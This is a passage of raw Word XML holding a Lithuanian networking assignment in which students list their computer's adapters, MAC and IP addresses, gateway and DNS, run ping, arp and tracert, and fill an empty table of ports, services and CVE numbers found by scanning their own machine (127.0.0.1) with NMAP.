        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F4247CD" w14:textId="49E0E985"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5 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>NAUDODAMI ASMENIN</w:t>
      </w:r>
      <w:r w:rsidR="009F4AF1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Į</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> KOMPIUTER</w:t>
      </w:r>
      <w:r w:rsidR="00BF3DC2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Į</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ATSAKYKITE Į KLAUSIMUS TEKSTU ARBA EKRANO NUOTRAUKOMIS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763CCE21" w14:textId="4110291F" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pateikite:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BE2D97" w14:textId="1F4F8E01" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Tinklo adapterių sąrašą;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBADF71" w14:textId="58A2173E" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Naudojamo kompiuterio HOSTNAME;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105E587E" w14:textId="3287179A" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Naudojamo kompiuterio, tinklo adapterių MAC adres</w:t>
      </w:r>
      <w:r w:rsidR="00B442B2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ų</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> sąrašą;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7316EF" w14:textId="034BE945" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Aktyvaus tinklo adapterio MAC adresą;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BC85C3" w14:textId="292997FB" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Naudojamo kompiuterio IP adresą;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3598D0EE" w14:textId="48BD6159" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Rezultatą su komanda PING [tinkle aktyvų IP adresą];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9ED00F" w14:textId="572EBAE0" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Rezultatą su komanda PING [kito kompiuterio HOSTNAME adresą];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40798471" w14:textId="73C8807B" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Panaudokite komandą „arp </w:t>
      </w:r>
      <w:r w:rsidR="00D67C3A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>a“ ir pateikite tik aktyvaus tinklo adapterio rezultatus;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680E680C" w14:textId="1C6FDAEE" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Naudojamo kompiuterio Default Gateway IP adresą;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798B42BE" w14:textId="29DE8807" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Naudojamo kompiuterio DNS IP adresus;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E199DE" w14:textId="4EA91C4D" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Rezultatą su komanda TRACERT [antrąjį DNS IP];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B68D171" w14:textId="700D77ED" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Rezultatą su komanda TRACERT [</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>www.google.lt</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> tinklalapio IP].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF29489" w14:textId="77777777" w:rsidR="00702013" w:rsidRPr="005A5C28" w:rsidRDefault="00702013" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EACEF56" w14:textId="4363E91B"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6 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>UŽPILDYKITE PATEIKTĄ LENTELĘ NAUDODAMI programinę įrangą „NMAP“ ir IP adresą 127.0.0.1.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10060" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1413"/>
        <w:gridCol w:w="1843"/>
        <w:gridCol w:w="1559"/>
        <w:gridCol w:w="1701"/>
        <w:gridCol w:w="1701"/>
        <w:gridCol w:w="1843"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="02F371F6" w14:textId="77777777" w:rsidTr="00031287">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5EA92C7B" w14:textId="4646F4ED" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Eil. </w:t>
            </w:r>
            <w:r w:rsidR="00853885" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>r.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4584D241" w14:textId="41DF85AF" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Serviso prieigos Nr. (port)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44A5D685" w14:textId="7A8D7DFA" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Serviso prieigos pavadinimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1AE32A99" w14:textId="0A1DFAC1" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Serviso prieigos versija</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58648853" w14:textId="0EB01AA7" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CVE numeris (-iai)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39CBFA03" w14:textId="7C46EEA5" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Pažeidžiamumo </w:t>
            </w:r>
            <w:r w:rsidR="00031287" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>r. iš duomenų bazės</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1771F9FF" w14:textId="77777777" w:rsidTr="00031287">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="736AC66C" w14:textId="11CEA7DC" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C97962A"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559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="592558BC"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701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="342D90E3"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701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A27BFAE"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843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68F833CE"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r>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="41877AA8" w14:textId="77777777" w:rsidTr="00031287">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="678255C6" w14:textId="70874919" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74CE6A94"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559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D35F83F"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701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37BE5AFD"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701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3624BD79"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843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AFA17F6"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r>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="65136868" w14:textId="77777777" w:rsidTr="00031287">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BA144DA" w14:textId="69B8FA77" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BE9E8E4"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559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BBCFFE1"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701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24E68DEA"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701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11349C9D"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843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59B7ADD9"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r>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="6290928C" w14:textId="77777777" w:rsidTr="00031287">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66182F01" w14:textId="213EDE89" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D09537D"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559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D9BE754"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701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16DC54CD"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701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C5C276E"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843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34F2159D"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r>
      <w:tr w:rsidR="3F56D931" w:rsidRPr="005A5C28" w14:paraId="4008558F" w14:textId="77777777" w:rsidTr="00031287">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="503A9274" w14:textId="1901B27C" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A9BB21B"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559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="125FAA56"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701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BBA8B67"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701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="448D773B"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c>
          <w:tcPr>
